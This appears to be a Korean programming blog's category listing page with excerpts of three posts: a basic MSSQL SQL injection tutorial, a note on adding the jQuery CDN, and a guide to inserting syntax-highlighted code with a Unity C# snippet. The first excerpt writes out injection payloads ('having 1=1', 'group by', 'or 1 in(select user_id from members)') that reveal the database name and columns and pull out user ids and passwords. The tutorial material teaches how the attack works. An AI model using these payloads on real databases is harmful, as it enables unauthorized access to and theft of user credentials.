프로그래밍언어/web (3) 썸네일형 리스트형 웹 해킹 기초 mssql, sql 인젝션 injection, 취약점 (1) 데이터베이스 이름 확인' and db_name() > 1 -- : 문자열이 인트랑 비교할 수 없다. 이것을 활용해서 데이터베이스 이름을 알아낼 수 있다. (2) 테이블 이름,첫 번째 컬럼' having 1=1 -- : 테이블 명과 첫번째 열(column) 알아낼 수 있다. (3) 두번째 컬럼 확인' group by num -- : 두번째 컬럼을 알아낼 수 있다. 알아낸 컬럼: user_id (4) 3번째 컬럼 확인' group by num,user_id -- : 3번째 컬럼 알아낼 수 있다. (5) 테이블의 컬럼값 확인데이터(id, pw)추출 : in() 활용 , not in() id값을 계속 알아내기' or 1 in(select user_id from members) -.. 제이쿼리 cdn 추가하기 그대로 복붙하면 된다!! 사실 내가 쓸려고 작성한거.. 글 작성시 프로그래밍 소스코드 넣는법 - 티스토리 블로그 1. http://colorscripter.com Color Scripter Simple & Flexible Syntax HighLighter colorscripter.com 요기로 들어갑니다! 2.언어를 입력하면 자동으로 인식합니다! 3.우측 아래 HTML로 복사 를 클릭합니다! 4.html 모드에서 붙여넣기 합니다! 5.그럼 밑에 처럼 코드가 나오게 됩니다! 감사합니다! 1 2 3 4 5 6 7 8 9 10 11 IEnumerator swing() { yield return new WaitForSeconds(0.1f); weaponArea.enabled = true; trailRenderer.enabled = true; yield return new WaitForSeconds(0.3f); trailR.. 이전 1 다음
